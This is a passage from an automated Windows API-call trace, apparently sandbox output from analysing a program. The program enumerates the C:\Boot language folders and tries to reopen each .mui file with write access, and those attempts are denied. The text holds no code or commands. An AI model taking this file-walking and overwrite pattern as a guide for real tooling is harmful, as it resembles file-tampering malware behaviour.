(lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.941] GetLastError () returned 0x5 [0082.941] GetLastError () returned 0x5 [0082.941] SetLastError (dwErrCode=0x5) [0082.941] GetLastError () returned 0x5 [0082.941] SetLastError (dwErrCode=0x5) [0082.941] GetLastError () returned 0x5 [0082.941] SetLastError (dwErrCode=0x5) [0082.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.941] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x694e8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧꾠")) returned 0 [0082.941] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0082.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.942] AreFileApisANSI () returned 1 [0082.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-ES", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-ES", lpUsedDefaultChar=0x0) returned 14 [0082.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.943] AreFileApisANSI () returned 1 [0082.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0082.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-ES") returned 14 [0082.943] CreateFileW (lpFileName="C:\\Boot\\es-ES" (normalized: "c:\\boot\\es-es"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.943] GetLastError () returned 0x5 [0082.943] GetLastError () returned 0x5 [0082.943] SetLastError (dwErrCode=0x5) [0082.943] GetLastError () returned 0x5 [0082.943] SetLastError (dwErrCode=0x5) [0082.943] GetLastError () returned 0x5 [0082.943] SetLastError (dwErrCode=0x5) [0082.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.943] AreFileApisANSI () returned 1 [0082.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-ES") returned 14 [0082.943] CreateFileW (lpFileName="C:\\Boot\\es-ES" (normalized: "c:\\boot\\es-es"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.943] GetLastError () returned 0x5 [0082.943] GetLastError () returned 0x5 [0082.943] SetLastError (dwErrCode=0x5) [0082.943] GetLastError () returned 0x5 [0082.943] SetLastError (dwErrCode=0x5) [0082.943] GetLastError () returned 0x5 [0082.943] SetLastError (dwErrCode=0x5) [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.944] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.944] FindFirstFileExW (in: lpFileName="C:\\Boot\\es-ES\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0082.944] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.944] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.945] AreFileApisANSI () returned 1 [0082.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-ES\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.946] AreFileApisANSI () returned 1 [0082.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0082.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0082.946] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.946] GetFileType (hFile=0x430) returned 0x1 [0082.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.946] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.946] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.946] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.947] CloseHandle (hObject=0x430) returned 1 [0082.947] AreFileApisANSI () returned 1 [0082.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0082.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0082.947] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.947] GetLastError () returned 0x5 [0082.947] GetLastError () returned 0x5 [0082.947] SetLastError (dwErrCode=0x5) [0082.947] GetLastError () returned 0x5 [0082.947] SetLastError (dwErrCode=0x5) [0082.947] GetLastError () returned 0x5 [0082.947] SetLastError (dwErrCode=0x5) [0082.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.947] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.948] AreFileApisANSI () returned 1 [0082.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-ES\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-ES\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.949] AreFileApisANSI () returned 1 [0082.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0082.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\memtest.exe.mui") returned 30 [0082.949] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.949] GetFileType (hFile=0x430) returned 0x1 [0082.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.949] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.949] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, 